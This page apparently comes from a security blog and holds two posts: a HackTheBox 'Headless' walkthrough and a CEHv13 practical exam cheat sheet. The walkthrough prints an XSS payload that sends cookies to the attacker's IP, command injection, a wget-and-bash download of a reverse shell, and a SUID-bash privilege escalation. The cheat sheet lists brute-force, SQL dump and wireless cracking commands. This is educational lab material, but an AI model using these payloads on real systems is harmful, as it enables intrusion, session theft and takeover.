nmap - CyberiumX

Hello folks,
In this blog post, our attention is directed towards the ‘Headless‘ machine, a beginner-friendly challenge featured on the HackTheBox platform. It presents an excellent learning opportunity for individuals keen on mastering Linux system penetration techniques. This challenge serves as an initial assessment to gauge your proficiency in conducting penetration tests on Linux servers.
As you navigate through the Headless machine challenge, you’ll have the chance to demonstrate your prowess in utilizing various Pentesting tools such as nmap, gobuster, netcat, Burp Suite, and wget. Join us as we embark on this thrilling journey of penetration testing.
To access the Headless machine on HackTheBox, simply click here.
First of all, let’s start the machine by clicking on ‘Join Machine’. Scan the obtained IP using the tool nmap.

nmap -sV <Machine_IP>

We will find two open ports; 22 (SSH) and 5000 (http). We can add the domain name of the IP which is headless.htb in /etc/hosts file. Now, we will try to access the website using the following URL:

http://headless.htb:5000

We can start directory bursting using gobuster with the help of the following command:

gobuster dir -u http://headless.htb:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null

We can see that there are two pages available; /support and /dashboard. Let’s visit both of them to find our way into the machine.

Getting Foothold on Headless

Upon inspecting the /support page, it’s evident that there’s a contact form, while the /dashboard page remains inaccessible due to our non-logged-in status. To gain access to the dashboard, we must first log in to the application. After exploring the contact form on the /support page, we can potentially uncover vulnerabilities such as Command Injection or Cross-site Scripting (XSS). To initiate our investigation, we’ll input arbitrary values into the form and intercept the traffic using Burp Suite. Within Burp Suite’s HTTP proxy, we’ll locate a POST request directed towards the /support endpoint. We’ll then transfer this request to Burp Repeater for vulnerability testing.
We have to provide a payload that might capture the cookies of the admin user who will be looking into our support queries. The payload will be as follows:

<script>document.location=’http://<Your_Kali_IP>/?cookie=’+document.cookie</script>

Also, we can URL encode this payload by pressing Ctrl + u. With this payload, we also need to start an HTTP server with the help of the following command:

python3 -m http.server 80

At this stage, we need to test the XSS payload across all parameters present in the POST request, including message, email, User-Agent, and others. After testing, we’ll discover that the same payload must be inserted into two parameters specifically: message and User-Agent.

After waiting for a minute, we can see that we received the cookie of the admin user. Now we can add this cookie value on our browser using inspect element.
Browse to http://headless.htb:5000/dashboard to access the Administrator Dashboard. Here, you’ll encounter an option to generate the website’s health report for a particular date. Let’s intercept this request via Burp Suite and transfer another POST request to the repeater tool.
Within the body of this request, locate the date parameter. We’ll attempt to detect a command injection vulnerability using this parameter by employing the following payload:

&& pwd

Also, we can URL encode this payload by pressing Ctrl + u. Now, let’s send the request and check the response where we will find that the date parameter is vulnerable to command injection vulnerability.

Now, we need to get a reverse shell using this parameter so we can simply take the bash payload of Pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). The payload is as follows:

bash -i >& /dev/tcp/<Your_Kali_IP>/1337 0>&1

We tried providing this payload directly on the date parameter but that didn’t help us gain the reverse shell. So, we can save this payload in a bash file and host this file on our web server so that we can first download this file on our victim machine and then execute it to get the reverse shell.
Let’s create a file (rev.sh) on our machine and save the above payload into it. We need to make this file executable and then finally run the Python3 HTTP server to host the file using the following command:

python3 -m http.server 80

After that, we need to provide the following payload into the date parameter:

&& wget http://<Your_Kali_IP>/rev.sh && bash rev.sh

We can also URL encode the above payload. Finally, we need to start the listener using netcat with the help of the following command:

nc -nlvp 1337

Now, after setting up everything we will switch to Burp Suite and click on Send button.
We will find that the rev.sh file is downloaded by the web server and then executed which results in getting a reverse shell on our netcat listener.

We got access to the dvir user. We can now access the contents of the user.txt file.

Privilege Escalation on Headless

Now it’s time to get root access on the target machine. We can start by checking the sudo privilege using the following command:

sudo -l

We can see that dvir user has permission to execute /usr/bin/syscheck binary as the root user. Let’s see the contents of this binary using the cat command.

We will find that there is a bash script (initdb.sh) that gets executed without specifying its full path. We can simply exploit this vulnerability by creating a malicious bash script with the same name. We need to run the following commands to achieve the same:

echo “chmod u+s /bin/bash” > initdb.sh
chmod +x initdb.sh

When we execute the syscheck binary, then our malicious script will be executed as it is in our current directory. This script will assign the root user’s SUID bit to the /bin/bash file. Let’s see this in action by running the following command:

sudo /usr/bin/syscheck

After running the above command, we need to execute the /bin/bash with the privileges of the owner (root). We can do this with the help of the following command:

/bin/bash -p

As soon as we run the above command, we will find that we have successfully escalated our privileges to the root user. Now we can simply access the contents of the root.txt file.
This machine provided a straightforward introduction to penetration testing on Linux systems, making it beneficial for beginners. We trust that you’ve grasped the underlying concepts explored within the Headless machine on HackTheBox.
You can explore the detailed write-ups for other machines of the HackTheBox platform on our website.

Happy Pentesting!!!
Team CyberiumX

Hello Folks!

In this blog post, we’ll discuss about Certified Ethical Hacker (CEHv13) Practical exam. We will focus on essential tools, techniques, and strategies to help you successfully navigate the practical exam. After reading this blog, you won’t need additional resources. We’ll provide comprehensive explanations to ensure clarity on every aspect.

Let’s initiate the process to begin the 6-hour exam. Once your exam environment is fully set up, proceed with the following steps:

Use Nmap to find all the live devices in different subnets.
Write down the IP addresses of the devices that are turned on.
Then, use Nmap again to find out which services and ports are open on each device.
You can also use Nmap to figure out what operating system each device is using.
Note down these details next to the corresponding IP addresses.
Once you have this information, you can start working on the questions given to you for the exam and use this information when required.
Now let’s discuss the topics and required tools with commands that you should know for the exam.

Important topics and tools for the CEHv13 practical exam

1. Scanning using Nmap

Host discovery

nmap -PS -sn 192.168.0.0/24

nmap -PR -sn 192.168.0.0/24

TCP Port scanning

nmap -sS 192.168.0.10

nmap -sT 192.168.0.10

nmap -p21,22,80 192.168.0.10

nmap -p- -sS 192.168.0.10

UDP Port scanning

nmap -sU 192.168.0.10

Service version detection

nmap -sV 192.168.0.10

Operating System detection

nmap -O 192.168.0.10

Vulnerability scanning using scripts

nmap -sC 192.168.0.10 (We can use this for getting FQDN)

nmap –script=smb-enum-* -p21 192.168.0.10

2. Enumeration

Hydra tool for Brute-forcing

hydra -L username.txt -P password.txt 192.168.0.10 <Protocol_Name> -t 10

hydra -L username.txt -P password.txt 192.168.0.10 -s <Port_number> <Protocol_Name>

hydra -l username -P password.txt 192.168.0.10 -s <Port_number> <Protocol_Name>

FTP Enumeration

Brute-forcing Credentials using Hydra

To connect to FTP server-> ftp 192.168.0.10

To download files from the FTP server-> get flag.txt

To upload files to the FTP server-> put file.txt

SMB Enumeration

Brute-forcing Credentials using Hydra

nmap -p 445 –script=smb-enum-shares 192.168.0.10

nmap -p 445 –script=smb-enum-users –script-args smbusername=username,smbpassword=password 192.168.0.10

nmap -p 445 –script=smb-enum-groups –script-args smbusername=username,smbpassword=password 192.168.0.10

To list shares available on the SMB server using anonymous user-> smbclient -L //192.168.0.10

To list shares available on the SMB server using anonymous user-> smbclient //192.168.0.10/sharename

To list shares available on the SMB server using a username-> smbclient -L //192.168.0.10 -U username

To connect to any share of SMB server using a username-> smbclient //192.168.0.10/sharename -U username

To download files from the FTP server-> get flag.txt

To upload files to the FTP server-> put file.txt

RDP Enumeration

Brute-forcing credentials using Hydra

Metasploit Framework module to identify RDP service running on which machine- auxiliary/scanner/rdp/rdp_scanner

To access the windows machine-> xfreerdp /u:username /p:password /v:192.168.0.10:3389

SSH Enumeration

Brute-forcing Credentials using Hydra

To access the machine using SSH protocol-> ssh username@192.168.0.10 -p 22

3. Vulnerability Assessment

Nessus

On Windows, open the browser and type https://localhost:8834

Login to Nessus using default credentials- admin:password

New Scan > Basic Network Scan

Provide name and target IP address then finally save and launch the scan.

4. Sniffing/Packet Analysis using Wireshark

Filters

http.request.method==post

http.request.method==get

Stream– To see the whole conversation

Right-click the request and then select Follow > TCP Stream

Red will be the request that we sent to the server and Blue will be the response we receive from the server.

We can toggle between different streams using the Stream option followed by a number in the right-hand bottom of the window.

Extracting Files from the packet capture

Go to File > Export Objects > Select a protocol using which the file was transferred (HTTP).

Now sort the results and try to get some file types we can save on our machine.

Finding Comments

pkt_comment contains “searchString”

To find DoS/DDoS attack (sort by packets in IPv4 based on the number of Packets transferred)

Statistics > Conversations > IPv4 > Packets

Sort the results by Bytes/Packets

Checking communications of IoT devices

Search MQTT on the Wireshark filter.

5. Steganography

OpenStego– Used to hide and extract data behind images.

Select Extract -> Choose the image -> Provide an Output file -> Provide the password

Snow– Used to hide and extract data behind a txt file in the form of whitespaces.

To hide the data in txt file-> .\SNOW.EXE -C -m “Hello! Welcome to CyberiumX.” -p “passwd123” ‘.\cyberiumx.txt’ file.txt

To extract the hidden data from txt file-> .\SNOW.EXE -C -p “passwd123” file.txt cyberiumx.txt

Covert_tcp– Used to hide and extract data in TCP headers

To compile covert_tcp.c file-> cc -o covert_tcp covert_tcp.c

Sender machine-> ./covert_tcp -source <IP> -dest <IP> -source_port <port> -dest_port <port> -file <txt file name>

Eg-> ./covert_tcp -source 192.168.0.10 -dest 192.168.0.20 -source_port 9999 -dest_port 8888 -file source.txt

Receiver machine-> ./covert_tcp -source <IP> -source_port <port> -server -file <txt file name>

Eg-> ./covert_tcp -source 192.168.0.10 -source_port 8888 -server -file destination.txt

6. Web Application attacks

SQL Injection using SQLmap

To enumerate database names-> sqlmap –url http://192.168.0.10/?id=2 –dbs

Save the GET/POST request in a file from Burp Suite. Right-click on the request > Save item > Select location and save the file (req.txt).

To list database name-> sqlmap -r req.txt –dbs

To list tables of single database-> sqlmap -r req.txt -D <database name> –tables

To list all columns of a database table-> sqlmap -r req.txt -D <database name> -T <table name> –columns

To dump the data from database’s table-> sqlmap -r req.txt –D <database name> -T <table name> –dump

WordPress website enumeration using wpscan

To enumerate username from WordPress websites-> wpscan –url http://192.168.0.10 –enumerate u

To Brute-force password of user-> wpscan –url http://192.168.0.10 -U username -P password.txt

Directory Bursting using Gobuster

gobuster dir -u http://192.168.0.10 -w /usr/share/wordlists/dirb/common.txt -x txt -t 40

7. Android attacks

ADB (Android Debug Bridge) tool

To connect with Android device-> adb connect 192.168.0.10:5555

To list the connected devices running in the same network-> adb devices

To get the shell of the remote device-> adb shell

In a separate Linux shell, use the following command to upload a file on an Android device-> adb push demo.txt /sdcard/Download

To download a file from an Android device-> adb pull /sdcard/Download/contacts.vcf .

8. Cryptography

sha384sum tool

sha384sum file.txt

Online websites to crack non-salted hashes

CrackStation (https://crackstation.net/)

Hashes (https://hashes.com/en/decrypt/hash)

BCTextEncoder– To encode/decode the data

Paste the encoded text -> Click on Decode -> Provide the password

Veracrypt– To encrypt/decrypt files in/from partitions.

Select the file that has the hidden file system -> Select any drive letter -> Click Mount -> Provide the password

It will create a new drive where we will find the hidden content.

9. Privilege Escalation

Insecure file/directory permission

To find the file containing the flag value-> find / -type f -name flag.txt 2>/dev/null

Run the ls -l command on the file to check the permission

Sudo Privileges

Command to check sudo privileges-> sudo -l

If you get any binary after running the above command then search the binary on GTFOBins (https://gtfobins.github.io/)

10. Wireless Attacks

Wi-Fi password cracking of WPA/WPA2/WPA3

aircrack-ng -w password.txt hashfile.cap

11. Malware Attacks:

Remote Access Trojan

From the Nmap result, look for default malware ports like 5552 (njRAT), 5110 (ProRAT), 6703 (Theef), and 9871 (Theef).

Now to connect with these ports, we require any one of the above-mentioned RAT software which you will find on the Windows machine.

Malware Analysis

Use DIE (Detect It Easy) and IDA pro tool to get the Entry point address of the malicious file.

Use DIE tool to get the version and hash of different components of the malicious file.

CEHv13 Practical Questions

Let’s explore the types of questions that might be presented in the CEH practical exam. Please keep in mind that while these questions are indicative, the actual exam may have different questions. However, having a good grasp of the tools and techniques outlined above will greatly enhance your chances of success.

Extract sensitive files hidden in an image file.
Get the severity score of a vulnerability.
Get remote access on an Android device and download files.
Brute-force SMB & FTP credentials and access them to download files.
Perform Nmap scan to identify web servers
Find FQDN of Domain Controller (Remember the machine on which you will find LDAP port open will be the Domain Controller).
Access the Linux machine using SSH and perform privilege escalation to read root files.
Access the volume encrypted by VeraCrypt.
Use BCTextEncoder to decode the flag.
Crack the hash.
Perform Malware analysis
From packet capture, identify a device IP that performed a DoS/DDoS attack and identify the packet size of any specific message.
Crack the password of the wireless network.
Access the machine using RAT.
Perform SQL injection to access database entries
Access sensitive files hosted on Web servers.

That covers everything required for participating in the CEH practical exam. We trust that the blog provided valuable information, and we extend our best wishes for your certification exam.

If you want to appear in Certified in Cybersecurity certification by (ISC)2 then you can visit our blog where we discussed how you can register and book your free slot for the CC exam and what you need to prepare for the CC exam.

Happy Pentesting!
Team CyberiumX

Tag: nmap

HackTheBox- Headless